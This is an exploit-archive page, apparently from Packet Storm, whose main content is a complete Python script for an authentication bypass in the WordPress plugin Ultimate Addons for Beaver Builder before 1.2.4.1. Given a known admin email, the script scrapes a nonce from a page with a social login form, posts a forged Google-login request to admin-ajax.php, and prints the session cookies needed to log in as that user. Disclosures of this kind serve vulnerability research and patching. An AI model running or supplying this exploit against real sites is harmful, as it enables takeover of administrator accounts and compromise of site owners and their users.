exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

WordPress Ultimate Addons For Beaver Builder 1.2.4.1 Authentication Bypass

WordPress Ultimate Addons For Beaver Builder 1.2.4.1 Authentication Bypass
Posted Dec 31, 2019
Authored by Nathan Hrncirik, Raphael Karger

WordPress Ultimate Addons for Beaver Builder version 1.2.4.1 suffers from an authentication bypass vulnerability.

tags | exploit, bypass
SHA-256 | 25d945db3c348efacc06bd68cdb206aa49043dd9497a393a508d7db6cb6334a9

WordPress Ultimate Addons For Beaver Builder 1.2.4.1 Authentication Bypass

Change Mirror Download
# Exploit Title: Wordpress Ultimate Addons for Beaver Builder 1.2.4.1 - Authentication Bypass
# Date: 2019-12-21
# Exploit Authors: Raphael Karger & Nathan Hrncirik
# Vendor Homepage: https://www.ultimatebeaver.com/
# Version: Ultimate Addons for Beaver Builder < 1.2.4.1
'''

Requirements:
* Valid Admin/User Email Needs to be Known
* Social Media Login Form has to be Embedded in the Specified URL

'''

#!/usr/bin/python3

import requests
import urllib.parse
import json
import argparse

banner = r''' ____ ___ _____ _______________________________ .__ .__ __
| | \/ _ \\______ \______ \_ _____/__ _________ | | ____ |__|/ |_
| | / /_\ \| | _/| | _/| __)_\ \/ /\____ \| | / _ \| \ __\
| | / | \ | \| | \| \> < | |_> > |_( <_> ) || |
|______/\____|__ /______ /|______ /_______ /__/\_ \| __/|____/\____/|__||__|
\/ \/ \/ \/ \/|__|
Ultimate Addons for Beaver Builder < 1.2.4.1 - Authentication Bypass
'''

class exploit(object):
def __init__(self, page, email):
self.page = page
self.sess = requests.Session()
self.email = email
self.nonce = False

def get_nonce(self):
try:
nonce_req = self.sess.get(self.page)
if nonce_req.text.find("data-nonce=") != -1:
self.nonce = nonce_req.text.split("data-nonce=")[1].split(">")[0]
except Exception as e:
print("Nonce Error: {}".format(e))

def auth_bypass(self):
try:
schema = urllib.parse.urlparse(self.page)
resp = self.sess.post("{}://{}/wp-admin/admin-ajax.php".format(schema.scheme, schema.netloc), data={
"action" : "uabb-lf-google-submit",
"name" : "raphaelrocks",
"email" : self.email,
"nonce" : self.nonce
})
if resp.status_code == 200:
print("Exploit Successful, Use the Cookies to Login: \n{}".format(
json.dumps(self.sess.cookies.get_dict(), indent=4)
))
except Exception as e:
print("Auth Bypass Error: {}".format(e))

def begin_exploit(self):
self.get_nonce()
if self.nonce:
print("Found Nonce: {}".format(self.nonce))
self.auth_bypass()
else:
print("Failed to Gather Nonce")

if __name__ == "__main__":
print(banner)
parser = argparse.ArgumentParser()
parser.add_argument("-e", "--email", dest="email", help="Email of Administrator User/Privileged User", required=True)
parser.add_argument("-u", "--url", dest="url", help="URL With Social Media Login Form", required=True)
args = parser.parse_args()
ex = exploit(args.url, args.email)
ex.begin_exploit()
Login or Register to add favorites

File Archive:

October 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    39 Files
  • 2
    Oct 2nd
    23 Files
  • 3
    Oct 3rd
    18 Files
  • 4
    Oct 4th
    20 Files
  • 5
    Oct 5th
    0 Files
  • 6
    Oct 6th
    0 Files
  • 7
    Oct 7th
    17 Files
  • 8
    Oct 8th
    66 Files
  • 9
    Oct 9th
    25 Files
  • 10
    Oct 10th
    20 Files
  • 11
    Oct 11th
    21 Files
  • 12
    Oct 12th
    0 Files
  • 13
    Oct 13th
    0 Files
  • 14
    Oct 14th
    0 Files
  • 15
    Oct 15th
    0 Files
  • 16
    Oct 16th
    0 Files
  • 17
    Oct 17th
    0 Files
  • 18
    Oct 18th
    0 Files
  • 19
    Oct 19th
    0 Files
  • 20
    Oct 20th
    0 Files
  • 21
    Oct 21st
    0 Files
  • 22
    Oct 22nd
    0 Files
  • 23
    Oct 23rd
    0 Files
  • 24
    Oct 24th
    0 Files
  • 25
    Oct 25th
    0 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    0 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close